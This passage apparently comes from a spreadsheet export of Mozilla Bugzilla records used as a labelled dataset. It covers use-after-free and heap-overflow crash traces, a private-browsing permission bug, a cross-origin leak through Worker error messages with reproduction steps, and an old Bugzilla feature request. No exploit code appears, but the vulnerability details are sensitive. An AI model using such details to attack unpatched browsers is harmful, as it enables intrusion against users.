    #20 0x7f65e8289ec2 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #21 0x7f65df48b8af in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7f65e87ba2e5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7f65e87ba2e5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #24 0x7f65e879a6ef in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #25 0x7f65e879a6ef in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #26 0x7f65e877f8ad in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #27 0x7f65e87ba94f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #28 0x7f65e87baf92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #29 0x7f65e852960c in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f65e84f8f5f in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:333:14
    #31 0x7f65e850672f in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:400:12
    #32 0x7f65e8508ede in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:689:12
    #33 0x7f65e87ba2e5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #34 0x7f65e87ba2e5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #35 0x7f65e87baf92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #36 0x7f65e828c12d in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
previously allocated by thread T0 here:
    #0 0x4b24fb in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0ded in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f65e458003a in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f65e458003a in NS_NewComputedDOMStyle(mozilla::dom::Element*, nsAString_internal const&amp;, nsIPresShell*, nsComputedDOMStyle::StyleType) /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:72
    #4 0x7f65e066c40d in nsGlobalWindow::GetComputedStyleHelperOuter(mozilla::dom::Element&amp;, nsAString_internal const&amp;, bool) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:10814:5
    #5 0x7f65e066be90 in nsGlobalWindow::GetComputedStyleHelper(mozilla::dom::Element&amp;, nsAString_internal const&amp;, bool, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:10827:3
    #6 0x7f65e066bb56 in nsGlobalWindow::GetComputedStyle(mozilla::dom::Element&amp;, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:10743:10
    #7 0x7f65e1bea044 in mozilla::dom::WindowBinding::getComputedStyle(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindow*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:3162:49
    #8 0x7f65e1be3634 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15157:13
    #9 0x7f65e87ba2e5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #10 0x7f65e87ba2e5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:447
    #11 0x7f65e879a6ef in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:510:12
    #12 0x7f65e879a6ef in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #13 0x7f65e877f8ad in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:405:12
    #14 0x7f65e87ba94f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:477:15
    #15 0x7f65e87baf92 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:523:10
    #16 0x7f65e8289ec2 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2769:12
    #17 0x7f65e3cb130b in Call /home/worker/workspace/build/src/obj-firefox/dist/include/jsapi.h:3310:14
    #18 0x7f65e3cb130b in nsXBLProtoImplAnonymousMethod::Execute(nsIContent*, JSAddonId*) /home/worker/workspace/build/src/dom/xbl/nsXBLProtoImplMethod.cpp:331
    #19 0x7f65e3c7b24e in nsXBLBinding::ExecuteAttachedHandler() /home/worker/workspace/build/src/dom/xbl/nsXBLBinding.cpp:634:5
    #20 0x7f65e3c7b04e in nsBindingManager::ProcessAttachedQueueInternal(unsigned int) /home/worker/workspace/build/src/dom/xbl/nsBindingManager.cpp:419:7
    #21 0x7f65e4aa5009 in ProcessAttachedQueue /home/worker/workspace/build/src/dom/xbl/nsBindingManager.h:105:5
    #22 0x7f65e4aa5009 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/nsPresShell.cpp:4167
    #23 0x7f65e47b721c in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1836:11
    #24 0x7f65e47c3a61 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:295:7
    #25 0x7f65e47c34f5 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:316:5
    #26 0x7f65e47c601e in applyImpl&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByValue&lt;mozilla::TimeStamp&gt; , 0&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:775:12
    #27 0x7f65e47c601e in apply&lt;mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:781
    #28 0x7f65e47c601e in mozilla::detail::RunnableMethodImpl&lt;void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp&gt;::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:810
    #29 0x7f65ddd178bb in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1216:7
    #30 0x7f65ddd999fc in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:361:10
    #31 0x7f65deb5140f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #32 0x7f65deac2fc8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #33 0x7f65deac2fc8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #34 0x7f65deac2fc8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #35 0x7f65e40ec19f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #36 0x7f65e6166451 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #37 0x7f65e62fd757 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4488:10
    #38 0x7f65e62feecd in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4621:8
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:639:14 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool)
Shadow bytes around the buggy address:
  0x0c188010c380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c188010c390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c188010c3a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c188010c3b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c188010c3c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=&gt;0x0c188010c3d0: fd fd fd fd[fd]fd fd fd fa fa fa fa fa fa fa fa
  0x0c188010c3e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c188010c3f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c188010c400: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c188010c410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c188010c420: fa fa fa fa fa fa fa fa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349==ABORTING</t>
        </is>
      </c>
      <c r="X5411" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5412">
      <c r="A5412" t="n">
        <v>1348257</v>
      </c>
      <c r="B5412" t="inlineStr">
        <is>
          <t>2017-03-17 03:09:04 -0700</t>
        </is>
      </c>
      <c r="C5412" t="inlineStr">
        <is>
          <t>Checking "Remember this decision" for WebRTC prompts in PBM should store for session only</t>
        </is>
      </c>
      <c r="D5412" t="inlineStr">
        <is>
          <t>2017-03-31 02:19:40 -0700</t>
        </is>
      </c>
      <c r="E5412" t="n">
        <v>1</v>
      </c>
      <c r="F5412" t="n">
        <v>1</v>
      </c>
      <c r="G5412" t="n">
        <v>2</v>
      </c>
      <c r="H5412" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5412" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5412" t="inlineStr">
        <is>
          <t>Site Permissions</t>
        </is>
      </c>
      <c r="K5412" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5412" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5412" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5412" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5412" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5412" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q5412" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5412" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5412" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5412" t="n">
        <v>1</v>
      </c>
      <c r="U5412" t="n">
        <v>0</v>
      </c>
      <c r="V5412" t="n">
        <v>21</v>
      </c>
      <c r="W5412" t="inlineStr">
        <is>
          <t>Right now I can persist this setting permanently, even if set in private mode. We should probably get it in line with the other prompts.
[Tracking Requested - why for this release]:
Violating the PBM promise of not storing user data except bookmarks etc.</t>
        </is>
      </c>
      <c r="X5412" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5413">
      <c r="A5413" t="n">
        <v>1160890</v>
      </c>
      <c r="B5413" t="inlineStr">
        <is>
          <t>2015-05-03 11:15:32 -0700</t>
        </is>
      </c>
      <c r="C5413" t="inlineStr">
        <is>
          <t>Cross-origin information disclosure with error message of Web Workers importScripts()</t>
        </is>
      </c>
      <c r="D5413" t="inlineStr">
        <is>
          <t>2024-05-30 09:00:50 -0700</t>
        </is>
      </c>
      <c r="E5413" t="n">
        <v>1</v>
      </c>
      <c r="F5413" t="n">
        <v>1</v>
      </c>
      <c r="G5413" t="n">
        <v>3</v>
      </c>
      <c r="H5413" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5413" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5413" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K5413" t="inlineStr">
        <is>
          <t>37 Branch</t>
        </is>
      </c>
      <c r="L5413" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5413" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5413" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5413" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5413" t="inlineStr">
        <is>
          <t>[b2g-adv-main2.5?][adv-main43+]</t>
        </is>
      </c>
      <c r="Q5413" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5413" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5413" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T5413" t="n">
        <v>1</v>
      </c>
      <c r="U5413" t="n">
        <v>0</v>
      </c>
      <c r="V5413" t="n">
        <v>106</v>
      </c>
      <c r="W5413" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Build ID: 20150415140819
Steps to reproduce:
1. Go to http://vulnerabledoma.in/fx_worker_importScripts.html and click the "go" button.
2. If you are Twitter login user, you can see the following alert:
https://analytics.twitter.com/user/[USER_NAME]/home
If not, you will see "https://analytics.twitter.com/about".
This means that Firefox leaks redirect information to unrelated site.
Actual results:
Firefox includes redirect information in error message.
Expected results:
Firefox should not include redirect information in error message.</t>
        </is>
      </c>
      <c r="X5413" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5414">
      <c r="A5414" t="n">
        <v>13540</v>
      </c>
      <c r="B5414" t="inlineStr">
        <is>
          <t>1999-09-09 23:57:04 -0700</t>
        </is>
      </c>
      <c r="C5414" t="inlineStr">
        <is>
          <t>Bugzilla should be more generic, adaptable, and customizable</t>
        </is>
      </c>
      <c r="D5414" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E5414" t="n">
        <v>1</v>
      </c>
      <c r="F5414" t="n">
        <v>1</v>
      </c>
      <c r="G5414" t="n">
        <v>4</v>
      </c>
      <c r="H5414" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5414" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5414" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5414" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5414" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5414" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5414" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5414" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5414" t="inlineStr"/>
      <c r="Q5414" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5414" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5414" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5414" t="n">
        <v>1</v>
      </c>
      <c r="U5414" t="n">
        <v>3</v>
      </c>
      <c r="V5414" t="n">
        <v>65</v>
      </c>
      <c r="W5414" t="inlineStr">
        <is>
          <t>Hello Terry,
I have been toying with Bugzilla 2.6 recently.  I have come to the conclusion
that Bugzilla serves well not JUST as a bug reporting system, bug as a general
solution for the more general idea of "problem" or "incident" reporting.
In fact, I've found this out as I continue trying to hack Bugzilla for use as a
contact management system for an association management provider firm that I am
currently working for.
This being the case, I have been changing the term "bug" in many cases to
"report."  I'd like to suggest that Bugzilla use this term in appropriate cases
in the stock code distribution as well.</t>
        </is>
      </c>
      <c r="X5414" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5415">
      <c r="A5415" t="n">
        <v>1292443</v>
      </c>
      <c r="B5415" t="inlineStr">
        <is>
          <t>2016-08-04 22:40:57 -0700</t>
        </is>
      </c>
      <c r="C5415" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow WRITE in rasterize_edges_1</t>
        </is>
      </c>
      <c r="D5415" t="inlineStr">
        <is>
          <t>2024-05-30 09:20:01 -0700</t>
        </is>
      </c>
      <c r="E5415" t="n">
        <v>1</v>
      </c>
      <c r="F5415" t="n">
        <v>1</v>
      </c>
      <c r="G5415" t="n">
        <v>3</v>
      </c>
      <c r="H5415" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5415" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5415" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5415" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5415" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5415" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5415" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+][adv-esr45.5+]</t>
        </is>
      </c>
      <c r="Q5415" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5415" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5415" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T5415" t="n">
        <v>1</v>
      </c>
      <c r="U5415" t="n">
        <v>0</v>
      </c>
      <c r="V5415" t="n">
        <v>53</v>
      </c>
      <c r="W5415" t="inlineStr">
        <is>
          <t>Created attachment 8778096
Testcase
==13447==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6230000601a8 at pc 0x0000004bea3c bp 0x7ffeffd80c70 sp 0x7ffeffd80420
WRITE of size 4112 at 0x6230000601a8 thread T0 (Web Content)
SCARINESS: 55 (multi-byte-write-heap-buffer-overflow-far-from-bounds)
    #0 0x4bea3b in __asan_memset _asan_rtl_
    #1 0x7fd8de8e2b4c in rasterize_edges_1 gfx/cairo/libpixman/src/pixman-edge-imp.h:125:7
    #2 0x7fd8de8e2b4c in pixman_rasterize_edges_no_accessors gfx/cairo/libpixman/src/pixman-edge.c:351
    #3 0x7fd8de8e2b4c in _moz_pixman_rasterize_edges gfx/cairo/libpixman/src/pixman-edge.c:382
    #4 0x7fd8de99d824 in _moz_pixman_rasterize_trapezoid gfx/cairo/libpixman/src/pixman-trap.c:386:2
    #5 0x7fd8de7b1392 in _pixman_image_add_traps gfx/cairo/cairo/src/cairo-image-surface.c:2466:2
    #6 0x7fd8de7b0701 in _composite_traps gfx/cairo/cairo/src/cairo-image-surface.c:2516:5
    #7 0x7fd8de7b5b18 in _clip_and_composite gfx/cairo/cairo/src/cairo-image-surface.c:2359:15
    #8 0x7fd8de7b891f in _clip_and_composite_trapezoids gfx/cairo/cairo/src/cairo-image-surface.c:3258:12
    #9 0x7fd8de7b7d7d in _clip_and_composite_polygon gfx/cairo/cairo/src/cairo-image-surface.c:3625:15
    #10 0x7fd8de7a3ceb in _cairo_image_surface_stroke gfx/cairo/cairo/src/cairo-image-surface.c:3717:15
    #11 0x7fd8de81bce1 in _cairo_surface_stroke gfx/cairo/cairo/src/cairo-surface.c:2296:11
    #12 0x7fd8de796646 in _cairo_gstate_stroke gfx/cairo/cairo/src/cairo-gstate.c:1166:14
    #13 0x7fd8de83ea7d in _moz_cairo_stroke_preserve gfx/cairo/cairo/src/cairo.c:2430:14
    #14 0x7fd8d75bfbcf in mozilla::gfx::DrawTargetCairo::DrawPattern(mozilla::gfx::Pattern const&amp;, mozilla::gfx::StrokeOptions const&amp;, mozilla::gfx::DrawOptions const&amp;, mozilla::gfx::DrawTargetCairo::DrawPatternType, bool) gfx/2d/DrawTargetCairo.cpp:1024:7
    #15 0x7fd8d75c4f81 in mozilla::gfx::DrawTargetCairo::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&amp;, mozilla::gfx::StrokeOptions const&amp;, mozilla::gfx::DrawOptions const&amp;) gfx/2d/DrawTargetCairo.cpp:1255:3
    #16 0x7fd8dcd8bca6 in nsSVGPathGeometryFrame::Render(gfxContext*, unsigned int, gfxMatrix const&amp;) layout/svg/nsSVGPathGeometryFrame.cpp:867:21
    #17 0x7fd8dcd8a20d in nsSVGPathGeometryFrame::PaintSVG(gfxContext&amp;, gfxMatrix const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) layout/svg/nsSVGPathGeometryFrame.cpp:293:5
    #18 0x7fd8dcd88726 in nsDisplaySVGPathGeometry::Paint(nsDisplayListBuilder*, nsRenderingContext*) layout/svg/nsSVGPathGeometryFrame.cpp:125:51
    #19 0x7fd8dc5f5f98 in mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, float, float, int) layout/base/FrameLayerBuilder.cpp:5710:21
    #20 0x7fd8dc5f9433 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*) layout/base/FrameLayerBuilder.cpp:5885:19
    #21 0x7fd8d7940a51 in mozilla::layers::BasicPaintedLayer::PaintThebes(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*) gfx/layers/basic/BasicPaintedLayer.cpp:95:9
    #22 0x7fd8d793b3ec in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintLayerContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:714:13
    #23 0x7fd8d7939c49 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*) gfx/layers/basic/BasicLayerManager.cpp:883:5
    #24 0x7fd8d793b0b2 in mozilla::layers::BasicLayerManager::PaintSelfOrChildren(mozilla::layers::PaintLayerContext&amp;, gfxContext*) gfx/layers/basic/BasicLayerManager.cpp:735:7
    #25 0x7fd8d7939c49 in mozilla::layers::BasicLayerManager::PaintLayer(gfxContext*, mozilla::layers::Layer*, void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*) gfx/layers/basic/BasicLayerManager.cpp:883:5
    #26 0x7fd8d7934f1d in mozilla::layers::BasicLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/basic/BasicLayerManager.cpp:623:5
    #27 0x7fd8dc5f5fb6 in PaintInactiveLayer layout/base/FrameLayerBuilder.cpp:3605:12
    #28 0x7fd8dc5f5fb6 in mozilla::FrameLayerBuilder::PaintItems(nsTArray&lt;mozilla::FrameLayerBuilder::ClippedDisplayItem&gt;&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, float, float, int) layout/base/FrameLayerBuilder.cpp:5696
    #29 0x7fd8dc5f9433 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, void*) layout/base/FrameLayerBuilder.cpp:5885:19
    #30 0x7fd8d79536e2 in mozilla::layers::ClientPaintedLayer::PaintThebes() gfx/layers/client/ClientPaintedLayer.cpp:94:5
    #31 0x7fd8d795437d in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) gfx/layers/client/ClientPaintedLayer.cpp:148:3
    #32 0x7fd8d796dd8c in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:29
    #33 0x7fd8d796dd8c in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:29
    #34 0x7fd8d796dd8c in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:29
    #35 0x7fd8d796dd8c in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:29
    #36 0x7fd8d796dd8c in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:29
    #37 0x7fd8d796dd8c in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:65:29
